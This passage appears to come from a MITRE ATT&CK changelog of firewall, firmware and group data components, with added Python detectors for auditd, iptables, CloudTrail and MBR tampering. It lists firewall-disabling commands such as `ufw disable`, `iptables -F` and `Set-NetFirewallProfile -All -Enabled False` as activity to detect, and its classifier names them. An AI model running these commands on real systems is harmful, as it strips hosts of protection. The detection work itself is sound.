- Temporary Disable for Malicious Operations: Temporarily disabling a firewall to allow malicious files or traffic, then re-enabling it to avoid detection.
- Using Command-Line Tools to Stop Firewalls: Running commands like `Set-NetFirewallProfile -All -Enabled False` on Windows or `ufw disable` / `systemctl stop ufw` on Linux.
This data component can be collected through the following measures:
Cloud Control Plane
- Azure Activity Logs:
- Enable logging of administrative actions, such as stopping or modifying Azure Firewall configurations.
- Use Azure Monitor to track specific firewall-related actions, including disabling or rule deletion.
- AWS CloudTrail Logs:
- Monitor `RevokeSecurityGroupIngress` or `RevokeSecurityGroupEgress` events to detect rule changes in AWS Security Groups, and `DeleteSecurityGroup` / `DeleteNetworkAcl` for outright removal.
- Google Cloud Platform Logs:
- Collect logs from the Firewall Rules resource in Google Cloud Operations Suite to detect rule deletions or modifications.
Host-Level Firewalls
- Windows Firewall Event Logs:
- Enable logging of firewall state changes:
- Security Event ID 5025: The Windows Firewall Service has been stopped (5024: the service started).
- Security Event ID 4950: A Windows Firewall setting has changed (for example, a profile turned off).
- Microsoft-Windows-Windows Firewall With Advanced Security/Firewall Event ID 2003: a profile setting changed.
- Use Sysmon for process creation events tied to firewall commands or scripts (Sysmon Event ID 1), or Security Event ID 4688 with command-line auditing enabled.
- Linux Firewall Logs: Use auditd to track commands like iptables, firewalld, or ufw: `auditctl -a always,exit -F arch=b64 -S execve -k firewall_disable` (this records every execve on the host, so filter on the command name downstream or scope the rule with `-F exe=/usr/sbin/iptables`).
- macOS Firewall: Monitor changes to the macOS Application Firewall using the `log show` command, and query its current state with `/usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate`.
Network-Level Monitoring
- IDS/IPS Alerts: Deploy IDS/IPS systems to monitor abnormal traffic flows that could indicate firewall disablement.
- NetFlow Data: Analyze NetFlow or packet capture data for traffic patterns inconsistent with firewall enforcement.
SIEM and CSPM Tools
- SIEM Integration: Use tools like Splunk or QRadar to centralize and analyze firewall disablement events from both hosts and cloud platforms.
- Cloud Security Posture Management (CSPM): Use CSPM solutions to monitor misconfigurations and track deactivation of critical cloud services like firewalls. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Firewall: Firewall Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description: An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)
New description: rewritten with host and cloud examples and collection measures; the full text is in the description row under Details.
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
revoked | | False
x_mitre_deprecated | | False
x_mitre_domains | | ['enterprise-attack']
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:17:06.404Z |
description | An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands) | Querying and extracting a list of available firewalls or their associated configurations and rules. This activity can occur across host systems and cloud control planes, providing insight into the state and configuration of firewalls that protect the environment. Examples:
- Querying Host-Based Firewalls: Using Windows PowerShell commands like `Get-NetFirewallRule` or Linux commands such as `iptables -L` or `firewall-cmd --list-all`.
- Cloud Firewall Rule Listing: Running commands like `az network firewall list` for Azure or `aws ec2 describe-security-groups` for AWS.
- Using Management APIs: Leveraging APIs like Google Cloud Firewall's `list` API method or AWS's DescribeSecurityGroups API.
- Identifying Misconfigurations: Extracting firewall rules to identify "allow all" policies or rules that lack logging.
- Enumerating with CLI Tools: Using CLI commands like `gcloud compute firewall-rules list` to extract firewall settings in Google Cloud.
This data component can be collected through the following measures:
Cloud Control Plane
- Azure Activity Logs: Collect Azure Firewall logs to monitor rule listing. Note that the Activity Log records control-plane write operations only; read-only calls such as `az network firewall list` are not recorded there.
- AWS CloudTrail: Monitor calls to `DescribeSecurityGroups` or `DescribeNetworkAcls` APIs; these are read-only management events and are logged by CloudTrail by default.
- Google Cloud Operations Suite: Collect logs for `gcloud compute firewall-rules list` or API calls to `firewalls.list`. List calls are ADMIN_READ Data Access audit logs, which are off by default and must be enabled for the Compute Engine API.
Host-Based Firewalls
- Windows Event Logs: Use PowerShell Script Block Logging (Event ID 4104) or transcription logs to capture commands like `Get-NetFirewallRule`.
- Linux Auditd: Track executions of commands like `iptables -L` or `ufw status` using auditd: `auditctl -a always,exit -F arch=b64 -S execve -k firewall_enum`
- macOS: Monitor logs for firewall-related queries via the Console app or log monitoring tools.
SIEM Integration
- Collect logs from endpoints and cloud platforms to centralize data and detect enumeration activity.
Endpoint Detection and Response (EDR)
- Use EDR tools to track enumeration commands or API calls performed on managed devices.
CSPM Tools
- Deploy Cloud Security Posture Management tools to monitor for unauthorized enumeration of firewall rules or configurations. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
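Both the Firewall Disable and the Firewall Enumeration descriptions above rely on the same auditd execve rule, which by itself only produces raw SYSCALL/EXECVE records; telling `iptables -F` (disable) from `iptables -L` (enumeration) is left to the analyst. The following is an added example serving both passages, not MITRE's code: it joins SYSCALL and EXECVE records by audit event id and classifies the reconstructed command line. The `audit.log` lines are constructed for the demo (they follow auditd's record layout, but the pids, timestamps and keys are invented), and the command patterns are this example's own list; arguments that auditd hex-encodes (values containing spaces or quotes) are not decoded here.

```python
"""Classify host-firewall commands captured by auditd's execve rule.
Added example, not MITRE's code. SAMPLE_AUDIT_LOG is constructed."""
import re

SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1713450000.101:201): arch=c000003e syscall=59 success=yes exit=0 pid=1401 auid=1000 uid=0 euid=0 comm="iptables" exe="/usr/sbin/xtables-nft-multi" key="firewall_disable"
type=EXECVE msg=audit(1713450000.101:201): argc=2 a0="iptables" a1="-F"
type=SYSCALL msg=audit(1713450000.250:202): arch=c000003e syscall=59 success=yes exit=0 pid=1402 auid=1000 uid=0 euid=0 comm="ufw" exe="/usr/bin/python3" key="firewall_disable"
type=EXECVE msg=audit(1713450000.250:202): argc=2 a0="ufw" a1="disable"
type=SYSCALL msg=audit(1713450001.010:203): arch=c000003e syscall=59 success=yes exit=0 pid=1403 auid=1000 uid=0 euid=0 comm="iptables" exe="/usr/sbin/xtables-nft-multi" key="firewall_enum"
type=EXECVE msg=audit(1713450001.010:203): argc=3 a0="iptables" a1="-L" a2="-n"
type=SYSCALL msg=audit(1713450002.300:204): arch=c000003e syscall=59 success=yes exit=0 pid=1404 auid=1000 uid=0 euid=0 comm="systemctl" exe="/usr/bin/systemctl" key="firewall_disable"
type=EXECVE msg=audit(1713450002.300:204): argc=3 a0="systemctl" a1="stop" a2="firewalld"
type=SYSCALL msg=audit(1713450003.000:205): arch=c000003e syscall=59 success=yes exit=0 pid=1405 auid=1000 uid=0 euid=0 comm="ls" exe="/usr/bin/ls" key="firewall_disable"
type=EXECVE msg=audit(1713450003.000:205): argc=2 a0="ls" a1="/etc"
"""

EVENT_ID = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")
ARG = re.compile(r'\ba(\d+)="([^"]*)"')
FIELD = re.compile(r'\b(auid|uid|exe|key)=("?)([^\s"]*)\2')


def classify(argv):
    """Map a command line to 'disable', 'enumerate' or None."""
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    args = argv[1:]
    if prog in ("iptables", "ip6tables", "iptables-legacy", "iptables-nft"):
        if any(a in ("-F", "--flush", "-X", "--delete-chain") for a in args):
            return "disable"
        if any(a in ("-P", "--policy") for a in args) and "ACCEPT" in args:
            return "disable"      # default policy opened up
        if any(a in ("-L", "--list", "-S", "--list-rules") for a in args):
            return "enumerate"
    elif prog == "nft":
        if args[:2] == ["flush", "ruleset"]:
            return "disable"
        if args[:1] == ["list"]:
            return "enumerate"
    elif prog == "ufw":
        if "disable" in args:
            return "disable"
        if "status" in args:
            return "enumerate"
    elif prog == "firewall-cmd":
        if any(a.startswith("--list") for a in args):
            return "enumerate"
    elif prog == "systemctl" and len(args) >= 2:
        unit = args[1].split(".")[0]
        if args[0] in ("stop", "disable", "mask") and unit in ("firewalld", "ufw", "nftables", "iptables"):
            return "disable"
    return None


def parse_audit_log(text):
    """Join SYSCALL and EXECVE records that share an audit event id."""
    events = {}
    for line in text.splitlines():
        m = EVENT_ID.search(line)
        if not m:
            continue
        ts, serial = m.groups()
        ev = events.setdefault(serial, {"serial": serial, "time": float(ts), "argv": []})
        if line.startswith("type=SYSCALL"):
            for name, _quote, value in FIELD.findall(line):
                ev[name] = value
        elif line.startswith("type=EXECVE"):
            args = sorted(ARG.findall(line), key=lambda kv: int(kv[0]))
            ev["argv"] = [value for _idx, value in args]
    return [events[k] for k in sorted(events, key=int)]


def analyze(text):
    """Return only the events that touch the host firewall, with a verdict
    and the login uid (auid) that survives sudo."""
    hits = []
    for ev in parse_audit_log(text):
        verdict = classify(ev["argv"])
        if verdict:
            hits.append({"serial": ev["serial"], "auid": ev.get("auid"),
                         "verdict": verdict, "argv": ev["argv"]})
    return hits


if __name__ == "__main__":
    for hit in analyze(SAMPLE_AUDIT_LOG):
        print(hit["serial"], hit["verdict"], "auid=" + str(hit["auid"]), " ".join(hit["argv"]))
```

The `auid` field is the one to pivot on: it is the original login uid, so a `sudo iptables -F` is attributed to the interactive user rather than to root.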
Firewall: Firewall Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description: Contextual data about a firewall and activity around it such as name, policy, or status
New description: rewritten with examples of firewall metadata and collection measures; the full text is in the description row under Details.
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
revoked | | False
x_mitre_deprecated | | False
x_mitre_domains | | ['enterprise-attack']
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:17:03.149Z |
description | Contextual data about a firewall and activity around it such as name, policy, or status | Contextual information about firewalls, including their configurations, policies, status, and other details such as names and associated rules. This metadata provides valuable insights into the operational state and configurations of firewalls, both in cloud control planes and host systems. Examples:
- Firewall Name and Configuration: The name, type, and purpose of a firewall such as "Azure Firewall - Production Environment."
- Policy Details: Capturing firewall policy details, such as "Allow inbound TCP 443 to web servers."
- Firewall Status: Status indicators like "Active," "Disabled," or "Pending Updates."
- Audit Log Metadata: Log entries showing administrative changes, such as "Policy modified by admin@domain.com."
- Rules Associated with Firewalls: Rules specifying source/destination IP ranges, protocols, and ports.
- Tagging Information: Tags like "Environment: Production" or "Owner: NetworkOps."
This data component can be collected through the following measures:
Cloud Control Plane
- Azure: Use Azure Activity Logs and Network Watcher to collect metadata for Azure Firewall.
- Example: `az network firewall show --name <firewall-name> --resource-group <resource-group>`
- AWS: Use AWS CloudTrail and describe commands: `aws ec2 describe-security-groups`
- Google Cloud: Use gcloud commands to extract metadata: `gcloud compute firewall-rules list --format=json`
Host-Based Firewalls
- Windows: Use PowerShell to gather metadata: `Get-NetFirewallRule -PolicyStore PersistentStore`
- Linux: Query iptables or nftables rulesets: `iptables -S` or `nft list ruleset`
- macOS: Use pfctl to extract metadata: `sudo pfctl -sr`
SIEM Integration
- Collect logs from cloud platforms, host systems, and network appliances.
API Monitoring
- Monitor API calls for metadata requests. Example (AWS): capture `DescribeSecurityGroups` or `DescribeNetworkAcls` calls via CloudTrail.
Endpoint Detection and Response (EDR)
- Use EDR solutions to monitor firewall management tools for configuration changes or queries. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
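`iptables -S` and its cloud equivalents return text, while the metadata this component describes (chain, policy, source range, port, target) is what a SIEM needs as fields. The following is an added example, not MITRE's code: a parser that turns `iptables -S` output into structured rule metadata, fingerprints the ruleset so drift between collections is cheap to spot, and flags the "allow all" conditions the Firewall Enumeration description mentions. The ruleset is constructed for the demo and the sensitive-port list is this example's own choice.

```python
"""Structure `iptables -S` output into firewall metadata and flag
permissive rules. Added example, not MITRE's code; the ruleset and the
port list are constructed."""
import hashlib
import shlex

SAMPLE_IPTABLES_S = """\
-P INPUT ACCEPT
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -s 10.0.0.0/8 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 3389 -j ACCEPT
-A INPUT -j DROP
"""

SENSITIVE_PORTS = {22, 23, 445, 1433, 3306, 3389, 5432, 5985, 5986}
ANY_SOURCE = ("0.0.0.0/0", "::/0")
PAIRED_OPTIONS = ("-i", "-o", "-m", "-d", "--ctstate", "--sport")


def parse_iptables_save(text):
    """Return (policies, rules). A rule keeps chain, source, protocol,
    destination port and target; other options are kept verbatim in 'extra'."""
    policies, rules = {}, []
    for line in text.splitlines():
        tokens = shlex.split(line)
        if not tokens:
            continue
        if tokens[0] == "-P":
            policies[tokens[1]] = tokens[2]
            continue
        if tokens[0] != "-A":
            continue
        rule = {"chain": tokens[1], "source": "0.0.0.0/0", "proto": "all",
                "dport": None, "target": None, "extra": []}
        i = 2
        while i < len(tokens):
            tok = tokens[i]
            if tok in ("-s", "--source"):
                rule["source"] = tokens[i + 1]
                i += 2
            elif tok in ("-p", "--protocol"):
                rule["proto"] = tokens[i + 1]
                i += 2
            elif tok == "--dport":
                rule["dport"] = tokens[i + 1]
                i += 2
            elif tok in ("-j", "--jump"):
                rule["target"] = tokens[i + 1]
                i += 2
            elif tok in PAIRED_OPTIONS:
                rule["extra"].append(tok + " " + tokens[i + 1])
                i += 2
            else:
                rule["extra"].append(tok)
                i += 1
        rules.append(rule)
    return policies, rules


def port_is_sensitive(dport):
    """True when the port (or lo:hi range) touches a sensitive service.
    No port restriction at all counts as sensitive."""
    if dport is None:
        return True
    lo, _, hi = dport.partition(":")
    lo, hi = int(lo), int(hi or lo)
    return any(lo <= p <= hi for p in SENSITIVE_PORTS)


def assess(policies, rules):
    """Flag accept-by-default chains and world-reachable sensitive ports."""
    findings = []
    for chain in ("INPUT", "FORWARD"):
        if policies.get(chain) == "ACCEPT":
            findings.append(f"{chain} default policy is ACCEPT")
    for r in rules:
        loopback_or_state = any(x.startswith("-i lo") or x.startswith("--ctstate") for x in r["extra"])
        if (r["chain"] == "INPUT" and r["target"] == "ACCEPT" and r["source"] in ANY_SOURCE
                and not loopback_or_state and port_is_sensitive(r["dport"])):
            findings.append(f"INPUT accepts {r['proto']}/{r['dport'] or 'any'} from any source")
    return findings


def fingerprint(text):
    """Order-preserving hash of the ruleset for drift detection between collections."""
    normalized = "\n".join(l.strip() for l in text.splitlines() if l.strip())
    return hashlib.sha256(normalized.encode()).hexdigest()


if __name__ == "__main__":
    pol, rul = parse_iptables_save(SAMPLE_IPTABLES_S)
    print(fingerprint(SAMPLE_IPTABLES_S)[:16], pol)
    for finding in assess(pol, rul):
        print("-", finding)
```

The same parse/assess split works for `nft list ruleset` or `Get-NetFirewallRule` output with a different front end; the assessment logic only needs chain, source, port and verdict.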
Firewall: Firewall Rule Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description: Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs)
New description: rewritten to cover rule creation, deletion and alteration with platform examples and collection measures; the full text is in the description row under Details.
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
revoked | | False
x_mitre_deprecated | | False
x_mitre_domains | | ['enterprise-attack']
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:16:56.720Z |
description | Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs) | The creation, deletion, or alteration of firewall rules to allow or block specific network traffic. Monitoring changes to these rules is critical for detecting misconfigurations, unauthorized access, or malicious attempts to bypass network protections. Examples:
- Rule Creation: Adding a new rule to allow inbound traffic on port 3389 (RDP).
- Rule Deletion: Deleting a rule that blocks inbound traffic from untrusted IP ranges.
- Rule Modification: Changing a rule to allow traffic from "any" source IP instead of a specific trusted range.
- Audit Log Metadata: Logs indicating "Firewall rule modified by admin@domain.com."
- Platform-Specific Scenarios
- Azure: Altering rules in an Azure Network Security Group (NSG).
- AWS: Modifying Security Group rules to allow traffic.
- Windows: Changes tracked in the Security Event Log (EID 4946: a rule was added, 4947: a rule was modified, 4948: a rule was deleted; 4950 covers profile-level setting changes).
This data component can be collected through the following measures:
Cloud Control Plane
- Azure: Collect rule modification logs from Azure Firewall Activity Logs.
- Example Command: `az network firewall policy rule-collection-group rule-collection list --policy-name <policy-name>`
- AWS: Use CloudTrail to track `AuthorizeSecurityGroupIngress` or `RevokeSecurityGroupIngress` actions.
Example: `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=AuthorizeSecurityGroupIngress`
- Google Cloud: Use gcloud commands to extract firewall rules: `gcloud compute firewall-rules list --format=json`
Host-Based Firewalls
- Windows:
- Collect events from the Windows Security Event Log (EID 4946: A change has been made to the Windows Firewall exception list, a rule was added; 4947: a rule was modified; 4948: a rule was deleted).
- Use PowerShell to track rule changes: `Get-NetFirewallRule -PolicyStore PersistentStore`
- Linux:
- Snapshot the live ruleset and diff it between collections: `iptables -S` (or `nft list ruleset`); `iptables -L -v` adds per-rule packet and byte counters.
- Use auditd to watch the persisted rules file (`/etc/iptables/rules.v4` on Debian/Ubuntu, `/etc/sysconfig/iptables` on RHEL-family): `auditctl -w /etc/iptables/rules.v4 -p wa -k firewall_rules`. Live changes made with `iptables` or `nft` are applied in the kernel and never touch this file, so pair the watch with an execve rule on those binaries.
- macOS: Use pfctl to monitor rule changes: `sudo pfctl -sr`
SIEM Integration
- Collect logs from cloud platforms, host systems, and network appliances for centralized monitoring.
API Monitoring
- Monitor API calls for firewall rule modifications. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
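The CloudTrail events named above (`AuthorizeSecurityGroupIngress`, `RevokeSecurityGroupIngress`) carry the new rule in `requestParameters.ipPermissions`, and the "any source on port 3389" case the description uses is only visible by walking that structure. The following is an added example, not MITRE's or AWS's code: a classifier that extracts actor, group, protocol, port range and CIDRs from each event and assigns a severity. The events are constructed for the demo (they mirror CloudTrail's `requestParameters` layout for these APIs, but the account, ARNs and group id are invented); the sensitive-port list and severity labels are this example's own choices.

```python
"""Triage security-group rule changes from CloudTrail-shaped records.
Added example, not MITRE's code. SAMPLE_EVENTS is constructed."""

RANK = {"info": 0, "medium": 1, "high": 2}
SENSITIVE_PORTS = {22, 23, 445, 1433, 3306, 3389, 5432}
WORLD = {"0.0.0.0/0", "::/0"}


def sg_event(name, actor, perms, time="2025-04-18T15:10:11Z"):
    """Constructed CloudTrail record (same requestParameters shape as the real API)."""
    return {"eventTime": time, "eventSource": "ec2.amazonaws.com", "eventName": name,
            "userIdentity": {"arn": actor},
            "requestParameters": {"groupId": "sg-0123456789abcdef0",
                                  "ipPermissions": {"items": perms}}}


def perm(proto, lo, hi, v4=(), v6=()):
    return {"ipProtocol": proto, "fromPort": lo, "toPort": hi,
            "ipRanges": {"items": [{"cidrIp": c} for c in v4]},
            "ipv6Ranges": {"items": [{"cidrIpv6": c} for c in v6]}, "groups": {}}


ACCOUNT = "arn:aws:iam::123456789012:user/"   # constructed account id
SAMPLE_EVENTS = [
    sg_event("AuthorizeSecurityGroupIngress", ACCOUNT + "alice", [perm("tcp", 3389, 3389, v4=["0.0.0.0/0"])]),
    sg_event("AuthorizeSecurityGroupIngress", ACCOUNT + "bob", [perm("tcp", 443, 443, v4=["0.0.0.0/0"], v6=["::/0"])]),
    sg_event("AuthorizeSecurityGroupIngress", ACCOUNT + "carol", [perm("tcp", 22, 22, v4=["10.0.0.0/8"])]),
    sg_event("RevokeSecurityGroupIngress", ACCOUNT + "alice", [perm("tcp", 22, 22, v4=["10.0.0.0/8"])]),
    {"eventTime": "2025-04-18T15:11:00Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "DescribeSecurityGroups", "userIdentity": {"arn": ACCOUNT + "alice"},
     "requestParameters": {}},
]


def classify_event(ev):
    """Return a triage record for a rule change, or None for other events."""
    name = ev.get("eventName")
    if name not in ("AuthorizeSecurityGroupIngress", "RevokeSecurityGroupIngress"):
        return None   # Describe* calls are enumeration, not modification
    params = ev.get("requestParameters") or {}
    result = {"time": ev.get("eventTime"), "actor": ev.get("userIdentity", {}).get("arn"),
              "group": params.get("groupId"), "action": name, "severity": "info", "reasons": []}
    for p in (params.get("ipPermissions") or {}).get("items", []):
        proto = p.get("ipProtocol", "-1")
        lo, hi = p.get("fromPort"), p.get("toPort")
        cidrs = [r["cidrIp"] for r in (p.get("ipRanges") or {}).get("items", [])]
        cidrs += [r["cidrIpv6"] for r in (p.get("ipv6Ranges") or {}).get("items", [])]
        all_ports = proto == "-1" or lo is None       # "All traffic" rules carry no ports
        ports = "all" if all_ports else f"{lo}-{hi}"
        if name == "RevokeSecurityGroupIngress":
            result["reasons"].append(f"removed {proto}/{ports} from {','.join(cidrs) or 'n/a'}")
            continue
        world = [c for c in cidrs if c in WORLD]
        if not world:
            result["reasons"].append(f"allowed {proto}/{ports} from {','.join(cidrs) or 'n/a'}")
            continue
        exposed = all_ports or any(lo <= port <= hi for port in SENSITIVE_PORTS)
        level = "high" if exposed else "medium"
        if RANK[level] > RANK[result["severity"]]:
            result["severity"] = level
        result["reasons"].append(f"world-open {proto}/{ports} via {','.join(world)}")
    return result


def triage(events):
    """Classify a batch and return rule changes, most severe first."""
    hits = [r for r in (classify_event(e) for e in events) if r]
    return sorted(hits, key=lambda r: RANK[r["severity"]], reverse=True)


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["severity"], r["action"], r["actor"], r["group"], "; ".join(r["reasons"]))
```

Security groups are allow-only, so a revoke reduces exposure and is recorded here at informational severity for the audit trail; for network ACLs, where a deleted entry can remove a deny, the equivalent `DeleteNetworkAclEntry` event deserves its own rule.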
Firmware: Firmware Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description: Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)
New description: rewritten with examples of boot-record, configuration and image tampering and collection measures; the full text is in the description row under Details.
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
revoked | | False
x_mitre_deprecated | | False
x_mitre_domains | | ['ics-attack', 'enterprise-attack']
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:12:52.606Z |
description | Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record) | Changes made to firmware, which may include its settings, configurations, or underlying data. This can encompass alterations to the Master Boot Record (MBR), Volume Boot Record (VBR), or other firmware components critical to system boot and functionality. Such modifications are often indicators of adversary activity, including malware persistence and system compromise. Examples:
- Changes to Master Boot Record (MBR): Modifying the MBR to load malicious code during the boot process.
- Changes to Volume Boot Record (VBR): Altering the VBR to redirect boot processes to malicious locations.
- Firmware Configuration Changes: Modifying BIOS/UEFI settings such as disabling Secure Boot.
- Firmware Image Tampering: Updating firmware with a malicious or unauthorized image.
- Logs or Errors Indicating Firmware Changes: Logs showing unauthorized firmware updates or checksum mismatches.
This data component can be collected through the following measures:
- BIOS/UEFI Logs: Enable and monitor BIOS/UEFI logs to capture settings changes or firmware updates.
- Firmware Integrity Monitoring: Use tools or firmware security features to detect changes to firmware components.
- Endpoint Detection and Response (EDR) Solutions: Many EDR platforms can detect abnormal firmware activity, such as changes to MBR/VBR or unauthorized firmware updates.
- Raw Disk Access Monitoring: The MBR and VBR are not files but the first sectors of the disk or volume, so monitor raw access to the block device using tools like Sysmon or auditd.
- Windows Example (Sysmon): Monitor Event ID 9 (RawAccessRead) for processes opening `\\.\PhysicalDrive0` or a volume handle directly.
- Linux Example (auditd): `auditctl -w /dev/sda -p wa -k firmware_modification` (use the actual block device, e.g. `/dev/nvme0n1`).
- Network Traffic Analysis: Capture firmware updates downloaded over the network, particularly from untrusted sources. Use network monitoring tools like Zeek or Wireshark to analyze firmware-related traffic.
- Secure Boot Logs: Collect and analyze Secure Boot logs for signs of tampering or unauthorized configurations. Example: Use PowerShell to retrieve Secure Boot settings on Windows: `Confirm-SecureBootUEFI`
- Vendor-Specific Firmware Tools: Many hardware vendors provide tools for firmware integrity checks. Examples:
- Intel Platform Firmware Resilience (PFR).
- Lenovo UEFI diagnostics. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
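The description's first two examples, MBR and VBR tampering, are detected by reading the boot sector and comparing it with a trusted baseline; the raw read itself is what Sysmon Event ID 9 and the auditd watch above record. The following is an added example, not MITRE's code: a 512-byte MBR parser that checks the boot signature, hashes the boot code and compares the partition table against a baseline. The sectors are constructed in memory (the "good" boot code is a few real x86 instructions, the partition layout is invented); on a real host the input would be the first 512 bytes of the disk device, which requires root. On UEFI/GPT systems LBA 0 holds a protective MBR and the same check applies to it.

```python
"""MBR parser and integrity check for the Firmware Modification
component. Added example, not MITRE's code; sectors are constructed."""
import hashlib
import struct

# status, CHS start, type, CHS end, LBA start, sector count (little-endian)
ENTRY = struct.Struct("<B3sB3sII")


def build_sample_mbr(boot_code):
    """Assemble a 512-byte MBR: boot code, one bootable Linux partition, 0x55AA."""
    code = boot_code.ljust(446, b"\x00")
    entry = ENTRY.pack(0x80, b"\x00\x00\x00", 0x83, b"\x00\x00\x00", 2048, 1_000_000)
    return code + entry + b"\x00" * 48 + b"\x55\xaa"


def parse_mbr(sector):
    """Split the sector into boot-code digest, partition entries and signature flag."""
    if len(sector) != 512:
        raise ValueError("an MBR is exactly 512 bytes")
    partitions = []
    for i in range(4):
        off = 446 + 16 * i
        status, _chs1, ptype, _chs2, lba, count = ENTRY.unpack(sector[off:off + 16])
        if ptype:
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba, "sectors": count})
    return {
        "signature_ok": sector[510:512] == b"\x55\xaa",
        "bootcode_sha256": hashlib.sha256(sector[:446]).hexdigest(),
        "partitions": partitions,
    }


def check_mbr(baseline, sector):
    """Compare a freshly read sector against a trusted parse_mbr() baseline."""
    now = parse_mbr(sector)
    findings = []
    if not now["signature_ok"]:
        findings.append("boot_signature_missing")
    if now["bootcode_sha256"] != baseline["bootcode_sha256"]:
        findings.append("bootcode_changed")
    if now["partitions"] != baseline["partitions"]:
        findings.append("partition_table_changed")
    return findings


# cli; xor ax,ax; mov ss,ax; mov sp,0x7c00  (typical boot-code prologue)
GOOD_MBR = build_sample_mbr(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c")
# boot code replaced by "jmp $" (constructed tampering)
TAMPERED_MBR = build_sample_mbr(b"\xeb\xfe")


def demo():
    """Baseline the good sector, then check a clean and a tampered read."""
    baseline = parse_mbr(GOOD_MBR)
    return check_mbr(baseline, GOOD_MBR), check_mbr(baseline, TAMPERED_MBR)


def read_boot_sector(device="/dev/sda"):
    """Real-host variant: read LBA 0 (needs root; this is the raw access
    that Sysmon Event ID 9 / the auditd watch above will log)."""
    with open(device, "rb") as disk:
        return disk.read(512)


if __name__ == "__main__":
    clean, tampered = demo()
    print("clean:", clean or "no findings")
    print("tampered:", tampered)
```

Store the baseline digest off-host (or in a TPM-sealed blob) so that an implant that rewrites the boot code cannot also rewrite the value it is compared against.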
Group: Group Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:15:40.457Z |
description | An extracted list of available groups and/or their associated settings (ex: AWS list-groups) | Extracting group lists from identity systems identifies permissions, roles, or configurations. Adversaries may exploit high-privilege groups or misconfigurations. Examples:
- AWS CLI: `aws iam list-groups`
- PowerShell: `Get-ADGroup -Filter *`
- (SaaS) Google Workspace: Admin SDK Directory API
- Azure: `Get-AzureADGroup`
- Microsoft 365: Graph API `GET https://graph.microsoft.com/v1.0/groups`
*Data Collection Measures:*
- Cloud Logging: Enable AWS CloudTrail, Azure Activity Logs, and Google Workspace Admin Logs for group-related actions.
- Directory Monitoring: Track logs like AD Event ID 4662 (object operations).
- API Monitoring: Log API activity like AWS IAM queries.
- SaaS Monitoring: Use platform logs (e.g., Office 365 Unified Audit Logs).
- SIEM Integration: Centralize group query tracking. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Group: Group Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:15:43.699Z |
description | Contextual data about a group which describes group and activity around it, such as name, permissions, or user accounts within the group | Group metadata includes attributes like name, permissions, purpose, and associated user accounts or roles, which adversaries may exploit for privilege escalation. Examples:
- Active Directory: `Get-ADGroup -Identity "Domain Admins" -Properties Members, Description`
- Azure AD: `Get-AzureADGroup -ObjectId <GroupId>`
- Google Workspace: `GET https://admin.googleapis.com/admin/directory/v1/groups/<groupKey>`
- AWS IAM: `aws iam list-group-policies --group-name <group_name>`
- Office 365: `GET https://graph.microsoft.com/v1.0/groups/<id>`
*Data Collection Measures:*
- Cloud Logging:
  - AWS CloudTrail for IAM group-related activities.
  - Azure AD Sign-In/Audit logs for metadata changes.
  - Google Admin Activity logs for API calls.
- Directory Logging: Log metadata access (e.g., Windows Event ID 4662).
- API Monitoring: Log API calls to modify group metadata (e.g., Microsoft Graph API).
- SIEM Integration: Centralize group metadata logs for analysis. |
